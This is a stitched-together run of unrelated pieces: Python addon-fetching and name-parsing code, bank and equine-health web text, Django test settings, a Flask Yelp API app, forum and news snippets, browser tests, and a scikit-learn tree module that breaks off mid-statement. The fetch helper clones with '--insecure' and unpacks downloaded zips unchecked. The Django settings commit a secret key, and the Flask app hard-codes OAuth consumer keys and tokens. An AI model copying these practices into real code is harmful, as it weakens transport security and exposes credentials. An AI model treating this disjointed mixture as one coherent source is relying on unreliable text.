    run('hg clone --insecure -r "%s" "%s" %s' % (revision, url, addon))
    shutil.rmtree(os.path.join(addon, '.hg'))
    silent_remove([os.path.join(addon, '.hgignore')])
def zip_pull(addon, url, revision):
    """Download the addon as a zip archive and unpack it in place.

    *revision* is accepted for interface parity with the other *_pull
    helpers; a plain zip download has no revision to select.
    """
    addon_zip = addon + '.zip'
    urllib.urlretrieve(url, addon_zip)
    zip_file = zipfile.ZipFile(addon_zip)
    try:
        zip_file.extractall()
    finally:
        # BUGFIX: close the archive before deleting it -- removing an
        # open file fails on Windows and leaks the handle elsewhere.
        zip_file.close()
    os.remove(addon_zip)
|
¹ Availability may be affected by your mobile device’s coverage area. Mobile Deposit is supported on Android mobile devices running OS 4.4+, iPhone® and iPad® running iOS 7.0+. Data rate charges from your service provider may apply. First National Bank of South Miami is not responsible for these charges.
FNBSM helps protect your information by using 128-bit SSL encryption technology within mobile banking sessions.
You can print and review the FNBSM Mobile Banking Terms & Conditions .
Deposit products offered by First National Bank of South Miami, Member FDIC.
Send money to anyone using our mobile app — all you need is the receiving party’s email address and telephone number. Once you have them set up in the system you can easily send payments electronically to friends & family!
|
import re
# I realize *fixes may not be the proper linguistic terms for these.
# No attempt was made to be exhaustive, but some sources used:
# http://en.wikipedia.org/wiki/List_of_post-nominal_letters
# http://en.wikipedia.org/wiki/Pre-nominal_letters
# http://en.wikipedia.org/wiki/Forms_of_address_in_the_United_Kingdom
# Of these, dropping the first 9 are the most likely to cause
# false matches. Perhaps they should be treated separately?
_suffixes = ['Jr', 'Sr', 'II', 'III', 'IV', 'V', 'VI', 'VII', 'VIII',
'PhD', 'MD', 'DD', 'JD', 'PharmD', 'PsyD', 'RN', 'EngD',
'DPhil', 'MA', 'MF', 'MBA', 'MSc', 'MEd', 'EdD', 'DMin',
'AB', 'BA', 'BFA', 'BSc', 'Esq', 'Esquire', 'MP', "MS",
'USA', 'USAF', 'USMC', 'USCG', 'USN', 'Ret', r'\(Ret\)',
'CPA', 'Junior', 'Senior']
_prefixes = ['Mr', 'Mister', 'Mrs', 'Ms', 'Miss', 'Dr', 'Doctor',
'Professor', 'The', 'Honou?rable', 'Chief', 'Justice',
'His', 'Her', 'Honou?r', 'Mayor', 'Associate', 'Majesty',
'Judge', 'Master', 'Sen', 'Senator', 'Rep', 'Deputy',
'Representative', 'Congress(wo)?man', 'Sir', 'Dame',
'Speaker', r'(Majority|Minority)\W+Leader',
'President', 'Chair(wo)?man', 'Pres', 'Governor',
'Gov', 'Assembly\W+Member', 'Highness', 'Hon',
'Prime\W+Minister', r'P\.?M', 'Admiral', 'Adm',
'Colonel', 'Col', 'General', 'Gen', 'Captain',
'Capt', 'Corporal', 'CPL', 'PFC', 'Private',
r'First\W+Class', 'Sergeant', 'Sgt', 'Commissioner',
'Lieutenant', 'Lt', 'Lieut', 'Brigadier',
'Major', 'Maj', 'Officer', 'Pilot',
'Warrant', 'Officer', 'Cadet', 'Reverand',
'Minister', 'Venerable', 'Father', 'Mother', 'Brother',
'Sister', 'Rabbi', 'Fleet']
# The suffixes are obviously not all acronyms but there are probably
# plenty of people out there mistakenly writing things like 'J.r.',
# so we go ahead and allow periods between any letters
_suffix_pattern = [r"\.?".join(suffix) for suffix in _suffixes]
_suffix_pattern = r'\W*,?(\W+(%s)\.?,?)+\W*$' % r"|".join(_suffix_pattern)
_suffix_pattern = re.compile(_suffix_pattern, re.IGNORECASE)
_prefix_pattern = r'^\W*((%s)\.?(\W+|$))+' % r"|".join(_prefixes)
_prefix_pattern = re.compile(_prefix_pattern, re.IGNORECASE)
def drop_affixes(name):
    """
    Return *name* with any leading prefixes and trailing suffixes removed.

    >>> drop_affixes("Mr. Michael Stephens, Jr.")
    'Michael Stephens'
    >>> drop_affixes("Lieutenant Col. Michael Stephens III, U.S.M.C. (Ret)")
    'Michael Stephens'
    >>> drop_affixes(" His Honour, Mayor M. Stephens III, J.D., M.D., RN ")
    'M. Stephens'
    >>> drop_affixes("Mr. Chief Justice")
    ''
    >>> drop_affixes("Michael Stephens")
    'Michael Stephens'
    >>> drop_affixes(" Michael Stephens ")
    'Michael Stephens'
    >>> drop_affixes(" Stephens, Michael ")
    'Stephens, Michael'
    """
    _, bare_name, _ = split_affixes(name)
    return bare_name
def split_affixes(name):
    """
    Split *name* into a ``(prefixes, name, suffixes)`` tuple.

    >>> split_affixes("Mr. Michael Stephens, Jr.")
    ('Mr.', 'Michael Stephens', 'Jr.')
    >>> split_affixes("Lieutenant Col. Michael Stephens III, U.S.M.C. (Ret)")
    ('Lieutenant Col.', 'Michael Stephens', 'III, U.S.M.C. (Ret)')
    >>> split_affixes(" His Honour, Mayor M. Stephens III, J.D., M.D., RN ")
    ('His Honour, Mayor', 'M. Stephens', 'III, J.D., M.D., RN')
    >>> split_affixes("Mr. Chief Justice")
    ('Mr. Chief Justice', '', '')
    >>> split_affixes("Michael Stephens")
    ('', 'Michael Stephens', '')
    >>> split_affixes(" Michael Stephens ")
    ('', 'Michael Stephens', '')
    >>> split_affixes(" Stephens, Michael ")
    ('', 'Stephens, Michael', '')
    """
    prefix_part, remainder = split_prefixes(name)
    core, suffix_part = split_suffixes(remainder)
    return (prefix_part, core, suffix_part)
def drop_suffixes(name):
    """
    Return *name* with any trailing suffixes removed.

    >>> drop_suffixes("Michael Stephens, Ph.D. J.D, USAF (Ret) III Esq")
    'Michael Stephens'
    >>> drop_suffixes("Michael Stephens Jr C.P.A ")
    'Michael Stephens'
    >>> drop_suffixes("Stephens, Michael Jr.")
    'Stephens, Michael'
    >>> drop_suffixes("Stephens, Michael ")
    'Stephens, Michael'
    >>> drop_suffixes("Stephens, M.")
    'Stephens, M.'
    """
    core, _ = split_suffixes(name)
    return core
def split_suffixes(name):
    """
    Split *name* into a ``(name, suffixes)`` tuple.

    >>> split_suffixes("Michael Stephens, Ph.D. J.D, USAF (Ret) III Esq")
    ('Michael Stephens', 'Ph.D. J.D, USAF (Ret) III Esq')
    >>> split_suffixes("Michael Stephens Jr C.P.A ")
    ('Michael Stephens', 'Jr C.P.A')
    >>> split_suffixes("Stephens, Michael Jr.")
    ('Stephens, Michael', 'Jr.')
    >>> split_suffixes("Stephens, Michael ")
    ('Stephens, Michael', '')
    >>> split_suffixes("Stephens, M.")
    ('Stephens, M.', '')
    """
    name = name.rstrip()
    match = _suffix_pattern.search(name)
    if not match:
        return (name, '')
    core = name[0:match.start()].rstrip()
    tail = match.group().lstrip('., \t\r\n')
    return (core, tail)
def drop_prefixes(name):
    """
    Return *name* with any leading prefixes removed.

    >>> drop_prefixes("Mr. Michael Stephens")
    'Michael Stephens'
    >>> drop_prefixes("Mr Michael Stephens")
    'Michael Stephens'
    >>> drop_prefixes(" Doctor Michael Stephens")
    'Michael Stephens'
    >>> drop_prefixes("The Honorable Michael Stephens")
    'Michael Stephens'
    >>> drop_prefixes("The Hon Mr. Michael Stephens")
    'Michael Stephens'
    >>> drop_prefixes(" Michael Stephens")
    'Michael Stephens'
    >>> drop_prefixes("M. Stephens")
    'M. Stephens'
    """
    _, remainder = split_prefixes(name)
    return remainder
def split_prefixes(name):
    """
    Split *name* into a ``(prefixes, name)`` tuple.

    >>> split_prefixes("Mr. Michael Stephens")
    ('Mr.', 'Michael Stephens')
    >>> split_prefixes("Mr Michael Stephens")
    ('Mr', 'Michael Stephens')
    >>> split_prefixes(" Doctor Michael Stephens")
    ('Doctor', 'Michael Stephens')
    >>> split_prefixes("The Honorable Michael Stephens")
    ('The Honorable', 'Michael Stephens')
    >>> split_prefixes("The Hon Mr. Michael Stephens")
    ('The Hon Mr.', 'Michael Stephens')
    >>> split_prefixes(" Michael Stephens")
    ('', 'Michael Stephens')
    >>> split_prefixes("M. Stephens")
    ('', 'M. Stephens')
    """
    name = name.lstrip()
    match = _prefix_pattern.match(name)
    if not match:
        return ('', name)
    return (match.group(0).strip(), name[match.end():].lstrip())
# Run the embedded doctests when this module is executed directly.
if __name__ == '__main__':
    import doctest
    doctest.testmod()
|
Colic is a general term referring to abdominal pain, which could have a variety of causes. It is a common problem that can affect horses of all ages.
Most cases turn out to be gastrointestinal in origin but it can originate in other organs, such as the kidneys, liver or spleen. Pain can also be from the reproductive organs or be the result of problems like bleeding into the abdomen, rupture of urinary bladder or infection.
Most incidences of colic pass quickly, with little intervention, while others become life-threatening and require hospitalisation and surgery. This emphasises the importance of speaking to your equine vet as soon as possible to ensure the best action is taken for your horse.
Assessment is likely to involve rectal examination, ultrasound scan and blood work, as well as palpation of areas of concern. Vets may pass a tube into the stomach or take a sample of fluid from the abdomen to help make an effective diagnosis. This will enable them to quickly decide if your horse needs surgical intervention or is likely to recover without surgery.
Depending on the cause of the pain and how persistent it is, the horse may be treated medically or surgically. In many cases treatment will just involve giving fluids and pain relief.
Cases of spasmodic colic, which may be caused by gas accumulation, feeding issues, parasitical worms, stress or dehydration, resolve with minimal medical intervention. Medical treatment is also the preferred option for an impacted large intestine (constipation).
In cases of displacement, where part of intestine has shifted out of its normal position but blood is still flowing to the intestine, either medical or surgical treatment might be appropriate. Strangulating lesions, where part of the intestine is displaced or twisted so blood flow to the intestine is compromised, would be a surgical emergency.
Colic can be the result of changes to feeding regime, therefore the maintenance of a consistent regime can help prevent it.
A diet that includes adequate fibre-rich foods, such as hay and grass helps prevent colic.
An appropriate worming programme is an essential part of your horse’s management as these internal parasites can cause a wide range of problems, including colic.
|
# Django settings for testapp project.
# This is a minimal test configuration (sqlite3 database, local static
# files, console-free logging) used to exercise the ios_notifications app.

# NOTE(review): DEBUG must be False in any production deployment.
DEBUG = True
TEMPLATE_DEBUG = DEBUG

ADMINS = (
    # ('Your Name', 'your_email@example.com'),
)

MANAGERS = ADMINS

DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': 'test.db',
        # The following settings are not used with sqlite3:
        'USER': '',
        'PASSWORD': '',
        'HOST': '',  # Empty for localhost through domain sockets or '127.0.0.1' for localhost through TCP.
        'PORT': '',  # Set to empty string for default.
    }
}

# Hosts/domain names that are valid for this site; required if DEBUG is False
# See https://docs.djangoproject.com/en/1.5/ref/settings/#allowed-hosts
ALLOWED_HOSTS = []

# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# In a Windows environment this must be set to your system time zone.
TIME_ZONE = 'America/Chicago'

# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'

SITE_ID = 1

# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True

# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale.
USE_L10N = True

# If you set this to False, Django will not use timezone-aware datetimes.
USE_TZ = True

# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/var/www/example.com/media/"
MEDIA_ROOT = ''

# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://example.com/media/", "http://media.example.com/"
MEDIA_URL = ''

# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/var/www/example.com/static/"
STATIC_ROOT = ''

# URL prefix for static files.
# Example: "http://example.com/static/", "http://static.example.com/"
STATIC_URL = '/static/'

# Additional locations of static files
STATICFILES_DIRS = (
    # Put strings here, like "/home/html/static" or "C:/www/django/static".
    # Always use forward slashes, even on Windows.
    # Don't forget to use absolute paths, not relative paths.
)

# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
    'django.contrib.staticfiles.finders.FileSystemFinder',
    'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)

# Make this unique, and don't share it with anybody.
# NOTE(review): this key is committed to source control; acceptable only for
# a throwaway test project — rotate it before any real deployment.
SECRET_KEY = 'c8+4^x2s-j3_ucbbh@r2#&)anj&k3#(u(w-)k&7&t)k&3b03#u'

# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
    'django.template.loaders.filesystem.Loader',
    'django.template.loaders.app_directories.Loader',
)

MIDDLEWARE_CLASSES = (
    'django.middleware.common.CommonMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    # Uncomment the next line for simple clickjacking protection:
    # 'django.middleware.clickjacking.XFrameOptionsMiddleware',
)

ROOT_URLCONF = 'testapp.urls'

# Python dotted path to the WSGI application used by Django's runserver.
WSGI_APPLICATION = 'testapp.wsgi.application'

TEMPLATE_DIRS = (
    # Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
    # Always use forward slashes, even on Windows.
    # Don't forget to use absolute paths, not relative paths.
)

INSTALLED_APPS = (
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.sites',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    # The app under test.
    'ios_notifications',
    # Uncomment the next line to enable the admin:
    'django.contrib.admin',
    # Uncomment the next line to enable admin documentation:
    # 'django.contrib.admindocs',
)

SESSION_SERIALIZER = 'django.contrib.sessions.serializers.JSONSerializer'

# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
    'version': 1,
    'disable_existing_loggers': False,
    'loggers': {}
}
|
International shocks and domestic prices : how large are strategic complementarities?
Réforme fiscale : quel rôle pour les modèles d'équilibre général calculable?
De Loecker, Jan (contributor); … - 2014 - Rev.
This paper examines how prices, markups and marginal costs respond to trade liberalization. Multi-product firms are used in the study. [BREAD WP No. 418].
How to price the unbundled local loop in the transition from copper to fiber access networks?
|
import os
from flask import Flask, request
import argparse
import json
import pprint
import sys
import urllib
import urllib2
import oauth2
import math
app = Flask(__name__)

# Yelp v2 OAuth 1.0a credentials used to sign outgoing search requests.
# NOTE(review): credentials are hard-coded in source; move them into
# environment variables or a config file before sharing/deploying this code.
CONSUMER_KEY = 'H85zQotPvyaafxY-wFjJOg'
CONSUMER_SECRET = 'LRROlUpL-TLVMA25NztXm6gVnHE'
TOKEN = 'Awp8bAxSd7p_dntg10i9jQEYGqIB1gdo'
TOKEN_SECRET = 'TBE0BGBLhDKprgT-Lt8LvJU5mkQ'
@app.route('/request')
def api_call():
host = 'api.yelp.com'
path = '/v2/search'
limit = request.args.get('limit') # limit in number of restaurants
radius = request.args.get('radius') # radius from center in miles
lat = request.args.get('lat') # center latitude
long_ = request.args.get('long') # center longitude
# test data
# limit = '10'
# radius = '10'
# lat = '37.77493'
# long_ = '-122.419415'
delta_lat = int(radius) / 69.11
delta_long = int(radius) / (69.11 * math.cos(float(lat)))
sw_lat = str(float(lat) - delta_lat)
sw_long = str(float(long_) - delta_long)
ne_lat = str(float(lat) + delta_lat)
ne_long = str(float(long_) + delta_long)
term = 'food'
# if request.args.has_key('cat'):
# cat = request.args.get('cat')
# print request.args.get('cat')
encoded_params = "term={0}&bounds={1},{2}|{3},{4}&limit={5}".format(term, sw_lat, sw_long, ne_lat, ne_long, limit)
# else:
# print 'donkeykong'
# encoded_params = "term={0}&bounds={1},{2}|{3},{4}&limit={5}".format(term, sw_lat, sw_long, ne_lat, ne_long, limit)
url = 'http://{0}{1}?{2}'.format(host, path, encoded_params)
# print url
consumer = oauth2.Consumer(CONSUMER_KEY, CONSUMER_SECRET)
oauth_request = oauth2.Request('GET', url, {})
oauth_request.update(
{
'oauth_nonce': oauth2.generate_nonce(),
'oauth_timestamp': oauth2.generate_timestamp(),
'oauth_token': TOKEN,
'oauth_consumer_key': CONSUMER_KEY
}
)
token = oauth2.Token(TOKEN, TOKEN_SECRET)
oauth_request.sign_request(oauth2.SignatureMethod_HMAC_SHA1(), consumer, token)
signed_url = oauth_request.to_url()
print 'Querying {0} ...'.format(url)
conn = urllib2.urlopen(signed_url, None)
try:
response = json.dumps(json.loads(conn.read()))
finally:
conn.close()
return response
if __name__ == '__main__':
    # Honor the PORT environment variable (e.g. set by Heroku), defaulting
    # to 5000, and listen on all interfaces.
    app.run(host='0.0.0.0', port=int(os.environ.get("PORT", 5000)))
|
But having proposed a tough rule — shares in Goldman Sachs (GS) and other big banks got walloped the day of the announcement — the administration then stood aside as the language got watered down in Congress.
Though this is hardly unusual in itself, it meant Obama punted on what now looks like his last chance to reform the big banks. After all the damage bankers did with their bonus-boosting high-stakes gambling, this doesn’t exactly register as a profile in courage.
The full column is worth a few minutes of your time . . .
|
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import unittest
from telemetry import browser_finder
from telemetry import options_for_unittests
class BrowserTest(unittest.TestCase):
  """Smoke tests for browser creation, command-line flag passing and tab
  management via the telemetry browser API."""

  def testBrowserCreation(self):
    # A browser must be discoverable for any of these tests to run.
    options = options_for_unittests.GetCopy()
    browser_to_create = browser_finder.FindBrowser(options)
    if not browser_to_create:
      raise Exception('No browser found, cannot continue test.')
    with browser_to_create.Create() as b:
      self.assertEquals(1, b.num_tabs)

      # Different browsers boot up to different things
      assert b.GetNthTabUrl(0)

  def testCommandLineOverriding(self):
    # This test starts the browser with an extra flag, --user-agent=telemetry,
    # and then verifies via navigator.userAgent that the flag actually reached
    # the launched browser's command line.
    # (Fixed: the previous comment claimed --enable-benchmarking /
    # chrome.Interval, which is not what this test does.)
    options = options_for_unittests.GetCopy()
    flag1 = '--user-agent=telemetry'
    options.extra_browser_args.append(flag1)

    browser_to_create = browser_finder.FindBrowser(options)
    with browser_to_create.Create() as b:
      with b.ConnectToNthTab(0) as t:
        t.page.Navigate('http://www.google.com/')
        t.WaitForDocumentReadyStateToBeInteractiveOrBetter()
        self.assertEquals(t.runtime.Evaluate('navigator.userAgent'),
                          'telemetry')

  def testNewCloseTab(self):
    options = options_for_unittests.GetCopy()
    browser_to_create = browser_finder.FindBrowser(options)
    with browser_to_create.Create() as b:
      # Browsers start with exactly one tab.
      self.assertEquals(1, b.num_tabs)
      existing_tab_url = b.GetNthTabUrl(0)

      # Opening a tab appends it; the original tab is untouched.
      b.NewTab()
      self.assertEquals(2, b.num_tabs)
      self.assertEquals(b.GetNthTabUrl(0), existing_tab_url)
      self.assertEquals(b.GetNthTabUrl(1), 'about:blank')

      # Closing the new tab restores the original state.
      b.CloseTab(1)
      self.assertEquals(1, b.num_tabs)
      self.assertEquals(b.GetNthTabUrl(0), existing_tab_url)

      # Closing the last remaining tab is disallowed.
      self.assertRaises(AssertionError, b.CloseTab, 0)
|
He’s got to go before it’s too late!!!
Yep, thought it was time I made my feelings known.
I love the fact that Marshall was here, what, four years and still loves the club. Great player, genuinely sad to see him leave when he did.
If we had kept him in 96/97 alongside Mason who was banging them in for fun we'd have won the league that season. Perfect storm, Wrighty establishing, Scowie coming in strong, Dyer coming in, Taricco establishing, Vaughan, Tanner, Petta, Mathie, Milton, Mason and Stockwell was superb that season too.
|
"""
This module gathers tree-based methods, including decision, regression and
randomized trees. Single and multi-output problems are both handled.
"""
# Authors: Gilles Louppe <g.louppe@gmail.com>
# Peter Prettenhofer <peter.prettenhofer@gmail.com>
# Brian Holt <bdholt1@gmail.com>
# Noel Dawe <noel@dawe.me>
# Satrajit Gosh <satrajit.ghosh@gmail.com>
# Joly Arnaud <arnaud.v.joly@gmail.com>
# Fares Hedayati <fares.hedayati@gmail.com>
# Nelson Liu <nelson@nelsonliu.me>
#
# License: BSD 3 clause
from __future__ import division
import numbers
from abc import ABCMeta
from abc import abstractmethod
from math import ceil
import numpy as np
from scipy.sparse import issparse
from ..base import BaseEstimator
from ..base import ClassifierMixin
from ..base import RegressorMixin
from ..externals import six
from ..feature_selection.from_model import _LearntSelectorMixin
from ..utils import check_array
from ..utils import check_random_state
from ..utils import compute_sample_weight
from ..utils.multiclass import check_classification_targets
from ..exceptions import NotFittedError
from ._criterion import Criterion
from ._splitter import Splitter
from ._tree import DepthFirstTreeBuilder
from ._tree import BestFirstTreeBuilder
from ._tree import Tree
from . import _tree, _splitter, _criterion
# Public API of this module.
__all__ = ["DecisionTreeClassifier",
           "DecisionTreeRegressor",
           "ExtraTreeClassifier",
           "ExtraTreeRegressor"]


# =============================================================================
# Types and constants
# =============================================================================

# Input dtype (np.float32) and target/weight dtype (np.float64) expected by
# the Cython tree internals.
DTYPE = _tree.DTYPE
DOUBLE = _tree.DOUBLE

# Mapping from criterion name to its Cython implementation, for
# classification and regression respectively.
CRITERIA_CLF = {"gini": _criterion.Gini, "entropy": _criterion.Entropy}
CRITERIA_REG = {"mse": _criterion.MSE, "friedman_mse": _criterion.FriedmanMSE,
                "mae": _criterion.MAE}

# Splitter implementations keyed by the `splitter` parameter, chosen
# depending on whether the input matrix is dense or sparse.
DENSE_SPLITTERS = {"best": _splitter.BestSplitter,
                   "random": _splitter.RandomSplitter}

SPARSE_SPLITTERS = {"best": _splitter.BestSparseSplitter,
                    "random": _splitter.RandomSparseSplitter}
# =============================================================================
# Base decision tree
# =============================================================================
class BaseDecisionTree(six.with_metaclass(ABCMeta, BaseEstimator,
                                          _LearntSelectorMixin)):
    """Base class for decision trees.

    Warning: This class should not be used directly.
    Use derived classes instead.
    """

    @abstractmethod
    def __init__(self,
                 criterion,
                 splitter,
                 max_depth,
                 min_samples_split,
                 min_samples_leaf,
                 min_weight_fraction_leaf,
                 max_features,
                 max_leaf_nodes,
                 random_state,
                 min_impurity_split,
                 class_weight=None,
                 presort=False,
                 increasing=None,
                 decreasing=None):
        # Hyper-parameters are stored verbatim (scikit-learn convention);
        # all validation is deferred to fit().
        # `increasing`/`decreasing` are lists of feature indices on which the
        # tree is constrained to be monotonically increasing/decreasing.
        self.criterion = criterion
        self.splitter = splitter
        self.max_depth = max_depth
        self.min_samples_split = min_samples_split
        self.min_samples_leaf = min_samples_leaf
        self.min_weight_fraction_leaf = min_weight_fraction_leaf
        self.max_features = max_features
        self.random_state = random_state
        self.max_leaf_nodes = max_leaf_nodes
        self.min_impurity_split = min_impurity_split
        self.class_weight = class_weight
        self.presort = presort
        self.increasing = increasing
        self.decreasing = decreasing

        # Fitted state; populated by fit().
        self.n_features_ = None
        self.n_outputs_ = None
        self.classes_ = None
        self.n_classes_ = None
        self.tree_ = None
        self.max_features_ = None

    def fit(self, X, y, sample_weight=None, check_input=True,
            X_idx_sorted=None):
        """Build a decision tree from the training set (X, y).

        Parameters
        ----------
        X : array-like or sparse matrix, shape = [n_samples, n_features]
            The training input samples. Internally, it will be converted to
            ``dtype=np.float32`` and if a sparse matrix is provided
            to a sparse ``csc_matrix``.

        y : array-like, shape = [n_samples] or [n_samples, n_outputs]
            The target values (class labels in classification, real numbers in
            regression). In the regression case, use ``dtype=np.float64`` and
            ``order='C'`` for maximum efficiency.

        sample_weight : array-like, shape = [n_samples] or None
            Sample weights. If None, then samples are equally weighted. Splits
            that would create child nodes with net zero or negative weight are
            ignored while searching for a split in each node. In the case of
            classification, splits are also ignored if they would result in any
            single class carrying a negative weight in either child node.

        check_input : boolean, (default=True)
            Allow to bypass several input checking.
            Don't use this parameter unless you know what you do.

        X_idx_sorted : array-like, shape = [n_samples, n_features], optional
            The indexes of the sorted training input samples. If many tree
            are grown on the same dataset, this allows the ordering to be
            cached between trees. If None, the data will be sorted here.
            Don't use this parameter unless you know what to do.

        Returns
        -------
        self : object
            Returns self.
        """

        random_state = check_random_state(self.random_state)
        if check_input:
            X = check_array(X, dtype=DTYPE, accept_sparse="csc")
            y = check_array(y, ensure_2d=False, dtype=None)
            if issparse(X):
                X.sort_indices()

                # The Cython splitters only support 32-bit (np.intc) index
                # arrays for sparse input.
                if X.indices.dtype != np.intc or X.indptr.dtype != np.intc:
                    raise ValueError("No support for np.int64 index based "
                                     "sparse matrices")

        # Determine output settings
        n_samples, self.n_features_ = X.shape
        is_classification = isinstance(self, ClassifierMixin)

        y = np.atleast_1d(y)
        expanded_class_weight = None

        if y.ndim == 1:
            # reshape is necessary to preserve the data contiguity against vs
            # [:, np.newaxis] that does not.
            y = np.reshape(y, (-1, 1))

        self.n_outputs_ = y.shape[1]

        if is_classification:
            check_classification_targets(y)
            y = np.copy(y)

            self.classes_ = []
            self.n_classes_ = []

            if self.class_weight is not None:
                y_original = np.copy(y)

            # Encode each output's class labels as integers 0..K-1 for the
            # Cython tree code; self.classes_ retains the original labels so
            # predict() can map back.
            y_encoded = np.zeros(y.shape, dtype=np.int)
            for k in range(self.n_outputs_):
                classes_k, y_encoded[:, k] = np.unique(y[:, k],
                                                       return_inverse=True)
                self.classes_.append(classes_k)
                self.n_classes_.append(classes_k.shape[0])
            y = y_encoded

            if self.class_weight is not None:
                expanded_class_weight = compute_sample_weight(
                    self.class_weight, y_original)

        else:
            # Regression: no class bookkeeping, one "class" per output.
            self.classes_ = [None] * self.n_outputs_
            self.n_classes_ = [1] * self.n_outputs_

        self.n_classes_ = np.array(self.n_classes_, dtype=np.intp)

        # The tree builder expects C-contiguous float64 targets.
        if getattr(y, "dtype", None) != DOUBLE or not y.flags.contiguous:
            y = np.ascontiguousarray(y, dtype=DOUBLE)

        # Check parameters
        # None sentinels are mapped to the internal "unlimited" encodings
        # (a huge max_depth, max_leaf_nodes == -1).
        max_depth = ((2 ** 31) - 1 if self.max_depth is None
                     else self.max_depth)
        max_leaf_nodes = (-1 if self.max_leaf_nodes is None
                          else self.max_leaf_nodes)

        # Fractional min_samples_leaf / min_samples_split are interpreted as
        # a percentage of n_samples.
        if isinstance(self.min_samples_leaf, (numbers.Integral, np.integer)):
            min_samples_leaf = self.min_samples_leaf
        else:  # float
            min_samples_leaf = int(ceil(self.min_samples_leaf * n_samples))

        if isinstance(self.min_samples_split, (numbers.Integral, np.integer)):
            min_samples_split = self.min_samples_split
        else:  # float
            min_samples_split = int(ceil(self.min_samples_split * n_samples))
            min_samples_split = max(2, min_samples_split)

        # A split must leave at least min_samples_leaf samples on each side.
        min_samples_split = max(min_samples_split, 2 * min_samples_leaf)

        # Resolve the max_features parameter (string alias, None, int or
        # fraction) into a concrete integer count.
        if isinstance(self.max_features, six.string_types):
            if self.max_features == "auto":
                if is_classification:
                    max_features = max(1, int(np.sqrt(self.n_features_)))
                else:
                    max_features = self.n_features_
            elif self.max_features == "sqrt":
                max_features = max(1, int(np.sqrt(self.n_features_)))
            elif self.max_features == "log2":
                max_features = max(1, int(np.log2(self.n_features_)))
            else:
                raise ValueError(
                    'Invalid value for max_features. Allowed string '
                    'values are "auto", "sqrt" or "log2".')
        elif self.max_features is None:
            max_features = self.n_features_
        elif isinstance(self.max_features, (numbers.Integral, np.integer)):
            max_features = self.max_features
        else:  # float
            if self.max_features > 0.0:
                max_features = max(1,
                                   int(self.max_features * self.n_features_))
            else:
                max_features = 0

        self.max_features_ = max_features

        if len(y) != n_samples:
            raise ValueError("Number of labels=%d does not match "
                             "number of samples=%d" % (len(y), n_samples))
        if not (0. < self.min_samples_split <= 1. or
                2 <= self.min_samples_split):
            raise ValueError("min_samples_split must be in at least 2"
                             " or in (0, 1], got %s" % min_samples_split)
        if not (0. < self.min_samples_leaf <= 0.5 or
                1 <= self.min_samples_leaf):
            raise ValueError("min_samples_leaf must be at least than 1 "
                             "or in (0, 0.5], got %s" % min_samples_leaf)
        if not 0 <= self.min_weight_fraction_leaf <= 0.5:
            raise ValueError("min_weight_fraction_leaf must in [0, 0.5]")
        if max_depth <= 0:
            raise ValueError("max_depth must be greater than zero. ")
        if not (0 < max_features <= self.n_features_):
            raise ValueError("max_features must be in (0, n_features]")
        if not isinstance(max_leaf_nodes, (numbers.Integral, np.integer)):
            raise ValueError("max_leaf_nodes must be integral number but was "
                             "%r" % max_leaf_nodes)
        if -1 < max_leaf_nodes < 2:
            raise ValueError(("max_leaf_nodes {0} must be either smaller than "
                              "0 or larger than 1").format(max_leaf_nodes))

        if sample_weight is not None:
            # Sample weights must be a 1-D, C-contiguous float64 array of
            # length n_samples.
            if (getattr(sample_weight, "dtype", None) != DOUBLE or
                    not sample_weight.flags.contiguous):
                sample_weight = np.ascontiguousarray(
                    sample_weight, dtype=DOUBLE)
            if len(sample_weight.shape) > 1:
                raise ValueError("Sample weights array has more "
                                 "than one dimension: %d" %
                                 len(sample_weight.shape))
            if len(sample_weight) != n_samples:
                raise ValueError("Number of weights=%d does not match "
                                 "number of samples=%d" %
                                 (len(sample_weight), n_samples))

        # Fold class_weight-derived weights into the per-sample weights.
        if expanded_class_weight is not None:
            if sample_weight is not None:
                sample_weight = sample_weight * expanded_class_weight
            else:
                sample_weight = expanded_class_weight

        # Set min_weight_leaf from min_weight_fraction_leaf
        if self.min_weight_fraction_leaf != 0. and sample_weight is not None:
            min_weight_leaf = (self.min_weight_fraction_leaf *
                               np.sum(sample_weight))
        else:
            min_weight_leaf = 0.

        if self.min_impurity_split < 0.:
            raise ValueError("min_impurity_split must be greater than or equal "
                             "to 0")

        presort = self.presort
        # Allow presort to be 'auto', which means True if the dataset is dense,
        # otherwise it will be False.
        if self.presort == 'auto' and issparse(X):
            presort = False
        elif self.presort == 'auto':
            presort = True

        if presort is True and issparse(X):
            raise ValueError("Presorting is not supported for sparse "
                             "matrices.")

        # If multiple trees are built on the same dataset, we only want to
        # presort once. Splitters now can accept presorted indices if desired,
        # but do not handle any presorting themselves. Ensemble algorithms
        # which desire presorting must do presorting themselves and pass that
        # matrix into each tree.
        if X_idx_sorted is None and presort:
            X_idx_sorted = np.asfortranarray(np.argsort(X, axis=0),
                                             dtype=np.int32)

        if presort and X_idx_sorted.shape != X.shape:
            raise ValueError("The shape of X (X.shape = {}) doesn't match "
                             "the shape of X_idx_sorted (X_idx_sorted"
